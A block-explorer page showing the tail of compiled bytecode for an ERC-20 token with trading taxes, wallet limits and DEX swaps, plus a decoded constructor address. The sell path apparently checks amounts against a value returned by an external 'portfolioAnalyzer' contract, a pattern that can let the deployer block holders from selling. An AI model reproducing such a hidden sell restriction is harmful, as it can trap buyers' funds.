8152600401611b33906139e6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611bab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba290613a78565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611c8991906130fd565b60405180910390a3505050565b6000611ca284846118c3565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114611d1c5781811015611d0e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d0590613ae4565b60405180910390fd5b611d1b8484848403611acd565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d91576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8890613b76565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611e00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611df790613c08565b60405180910390fd5b60008103611e1957611e1483836000612871565b612717565b601260009054906101000a900460ff161561238d57611e3783610e4f565b158015611e4a5750611e4882610e4f565b155b8015611e835750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611ebd575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611ed65750600f60009054906101000a900460ff16155b15611fd157601260019054906101000a900460ff16611fd057601160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680611f905750601160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b611fcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fc690613c74565b60405180910390fd5b5b5b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156120745750601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561211b57600a548111156120be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120b590613d06565b60405180910390fd5b600c546120ca83611084565b826120d591906135d8565b1115612116576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161210d90613d72565b60405180910390fd5b61238c565b600960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156121be5750601060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156122e057600a54811115612208576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121ff90613e04565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16630572b0cc6040518163ffffffff1660e01b8152600401602060405180830381865afa158015612275573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122999190613e39565b8111156122db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122d290613efe565b60405180910390fd5b61238b565b601060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661238a57600c5461233d83611084565b8261234891906135d8565b1115612389576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161238090613d72565b60405180910390fd5b5b5b5b5b600061239830611084565b90506000600b5482101590508080156123bd5750601260029054906101000a900460ff165b80156123d65750600f60009054906101000a900460ff16155b801561242c5750600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124825750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124d85750601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561251c576001600f60006101000a81548160ff021916908315150217905550612500612af0565b6000600f60006101000a81548160ff0219169083151502179055505b6000600f60009054906101000a900460ff16159050601160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806125d25750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156125dc57600090505b6000811561270757600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561263f57506000600e54115b15612665576064600e54866126549190613458565b61265e91906134e1565b90506126e3565b600960008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156126c057506000600d54115b156126e2576064600d54866126d59190613458565b6126df91906134e1565b90505b5b60008111156126f8576126f7873083612871565b5b808561270491906135a4565b94505b612712878787612871565b505050505b505050565b61273081600561195690919063ffffffff16565b8073ffffffffffffffffffffffffffffffffffffffff167f44d6d25963f097ad14f29f06854a01f575648a1ef82f30e562ccd3889717e33960405160405180910390a250565b61278a816005612b4090919063ffffffff16565b8073ffffffffffffffffffffffffffffffffffffffff167fa3b62bc36326052d97ea62d63c3d60308ed4c3ea8ac079dd8499f1e9c4f80c0f60405160405180910390a250565b80600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036128e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128d790613b76565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361294f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161294690613c08565b60405180910390fd5b61295a838383612be7565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156129e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129d790613f90565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612a7391906135d8565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612ad791906130fd565b60405180910390a3612aea848484612bec565b50505050565b6000612afb30611084565b905060008103612b0b5750612b3e565b6014600b54612b1a9190613458565b811115612b33576014600b54612b309190613458565b90505b612b3c81612bf1565b505b565b612b4a82826119fe565b612b89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b8090614022565b60405180910390fd5b60008260000160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b505050565b505050565b6000600267ffffffffffffffff811115612c0e57612c0d614042565b5b604051908082528060200260200182016040528015612c3c5781602001602082028036833780820191505090505b5090503081600081518110612c5457612c53614071565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612cf9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612d1d91906140b5565b81600181518110612d3157612d30614071565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612d96307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84611acd565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac94783600084600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518663ffffffff1660e01b8152600401612e1a9594939291906141db565b600060405180830381600087803b158015612e3457600080fd5b505af1158015612e48573d6000803e3d6000fd5b505050505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612e8a578082015181840152602081019050612e6f565b83811115612e99576000848401525b50505050565b6000601f19601f8301169050919050565b6000612ebb82612e50565b612ec58185612e5b565b9350612ed5818560208601612e6c565b612ede81612e9f565b840191505092915050565b60006020820190508181036000830152612f038184612eb0565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612f3b82612f10565b9050919050565b612f4b81612f30565b8114612f5657600080fd5b50565b600081359050612f6881612f42565b92915050565b6000819050919050565b612f8181612f6e565b8114612f8c57600080fd5b50565b600081359050612f9e81612f78565b92915050565b60008060408385031215612fbb57612fba612f0b565b5b6000612fc985828601612f59565b9250506020612fda85828601612f8f565b9150509250929050565b60008115159050919050565b612ff981612fe4565b82525050565b60006020820190506130146000830184612ff0565b92915050565b6000602082840312156130305761302f612f0b565b5b600061303e84828501612f59565b91505092915050565b60006020828403121561305d5761305c612f0b565b5b600061306b84828501612f8f565b91505092915050565b6000819050919050565b600061309961309461308f84612f10565b613074565b612f10565b9050919050565b60006130ab8261307e565b9050919050565b60006130bd826130a0565b9050919050565b6130cd816130b2565b82525050565b60006020820190506130e860008301846130c4565b92915050565b6130f781612f6e565b82525050565b600060208201905061311260008301846130ee565b92915050565b6000806040838503121561312f5761312e612f0b565b5b600061313d85828601612f59565b925050602061314e85828601612f59565b9150509250929050565b60008060006060848603121561317157613170612f0b565b5b600061317f86828701612f59565b935050602061319086828701612f59565b92505060406131a186828701612f8f565b9150509250925092565b6131b481612f30565b82525050565b60006020820190506131cf60008301846131ab565b92915050565b600060ff82169050919050565b6131eb816131d5565b82525050565b600060208201905061320660008301846131e2565b92915050565b61321581612fe4565b811461322057600080fd5b50565b6000813590506132328161320c565b92915050565b6000806040838503121561324f5761324e612f0b565b5b600061325d85828601612f59565b925050602061326e85828601613223565b9150509250929050565b60006020828403121561328e5761328d612f0b565b5b600061329c84828501613223565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806132ec57607f821691505b6020821081036132ff576132fe6132a5565b5b50919050565b7f41646d696e526f6c653a2063616c6c657220646f6573206e6f7420686176652060008201527f746865204d696e74657220726f6c650000000000000000000000000000000000602082015250565b6000613361602f83612e5b565b915061336c82613305565b604082019050919050565b6000602082019050818103600083015261339081613354565b9050919050565b7f73656c6c546178206d757374206e6f742062652067726561746572207468616e60008201527f2034252021000000000000000000000000000000000000000000000000000000602082015250565b60006133f3602583612e5b565b91506133fe82613397565b604082019050919050565b60006020820190508181036000830152613422816133e6565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061346382612f6e565b915061346e83612f6e565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156134a7576134a6613429565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006134ec82612f6e565b91506134f783612f6e565b925082613507576135066134b2565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b600061356e602f83612e5b565b915061357982613512565b604082019050919050565b6000602082019050818103600083015261359d81613561565b9050919050565b60006135af82612f6e565b91506135ba83612f6e565b9250828210156135cd576135cc613429565b5b828203905092915050565b60006135e382612f6e565b91506135ee83612f6e565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561362357613622613429565b5b828201905092915050565b7f627579546178206d757374206e6f742062652067726561746572207468616e2060008201527f3225202100000000000000000000000000000000000000000000000000000000602082015250565b600061368a602483612e5b565b91506136958261362e565b604082019050919050565b600060208201905081810360008301526136b98161367d565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b600061371c603983612e5b565b9150613727826136c0565b604082019050919050565b6000602082019050818103600083015261374b8161370f565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006137ae602583612e5b565b91506137b982613752565b604082019050919050565b600060208201905081810360008301526137dd816137a1565b9050919050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000613840602483612e5b565b915061384b826137e4565b604082019050919050565b6000602082019050818103600083015261386f81613833565b9050919050565b7f526f6c65733a206163636f756e7420616c72656164792068617320726f6c6500600082015250565b60006138ac601f83612e5b565b91506138b782613876565b602082019050919050565b600060208201905081810360008301526138db8161389f565b9050919050565b7f526f6c65733a206163636f756e7420697320746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061393e602283612e5b565b9150613949826138e2565b604082019050919050565b6000602082019050818103600083015261396d81613931565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006139d0602483612e5b565b91506139db82613974565b604082019050919050565b600060208201905081810360008301526139ff816139c3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000613a62602283612e5b565b9150613a6d82613a06565b604082019050919050565b60006020820190508181036000830152613a9181613a55565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000613ace601d83612e5b565b9150613ad982613a98565b602082019050919050565b60006020820190508181036000830152613afd81613ac1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613b60602583612e5b565b9150613b6b82613b04565b604082019050919050565b60006020820190508181036000830152613b8f81613b53565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613bf2602383612e5b565b9150613bfd82613b96565b604082019050919050565b60006020820190508181036000830152613c2181613be5565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000613c5e601683612e5b565b9150613c6982613c28565b602082019050919050565b60006020820190508181036000830152613c8d81613c51565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000613cf0603583612e5b565b9150613cfb82613c94565b604082019050919050565b60006020820190508181036000830152613d1f81613ce3565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000613d5c601383612e5b565b9150613d6782613d26565b602082019050919050565b60006020820190508181036000830152613d8b81613d4f565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000613dee603683612e5b565b9150613df982613d92565b604082019050919050565b60006020820190508181036000830152613e1d81613de1565b9050919050565b600081519050613e3381612f78565b92915050565b600060208284031215613e4f57613e4e612f0b565b5b6000613e5d84828501613e24565b91505092915050565b7f706f7274666f6c696f416e616c797a65722072657761726473206d757374206260008201527f6520736d616c6c6572207468616e206d61782077616c6c657420616d6f756e7460208201527f2e00000000000000000000000000000000000000000000000000000000000000604082015250565b6000613ee8604183612e5b565b9150613ef382613e66565b606082019050919050565b60006020820190508181036000830152613f1781613edb565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613f7a602683612e5b565b9150613f8582613f1e565b604082019050919050565b60006020820190508181036000830152613fa981613f6d565b9050919050565b7f526f6c65733a206163636f756e7420646f6573206e6f74206861766520726f6c60008201527f6500000000000000000000000000000000000000000000000000000000000000602082015250565b600061400c602183612e5b565b915061401782613fb0565b604082019050919050565b6000602082019050818103600083015261403b81613fff565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000815190506140af81612f42565b92915050565b6000602082840312156140cb576140ca612f0b565b5b60006140d9848285016140a0565b91505092915050565b6000819050919050565b60006141076141026140fd846140e2565b613074565b612f6e565b9050919050565b614117816140ec565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61415281612f30565b82525050565b60006141648383614149565b60208301905092915050565b6000602082019050919050565b60006141888261411d565b6141928185614128565b935061419d83614139565b8060005b838110156141ce5781516141b58882614158565b97506141c083614170565b9250506001810190506141a1565b5085935050505092915050565b600060a0820190506141f060008301886130ee565b6141fd602083018761410e565b818103604083015261420f818661417d565b905061421e60608301856131ab565b61422b60808301846130ee565b969550505050505056fea26469706673582212204e390070b1b6960f30b297b7504e61521836ed94dbd19f326b3bf7ca2788efc964736f6c634300080f0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000001111111254eeb25477b68fb85ed929f73a960582

-----Decoded View---------------
Arg [0] : _aggregator (address): 0x1111111254EEB25477B68fb85Ed929f73A960582

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000001111111254eeb25477b68fb85ed929f73a960582


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.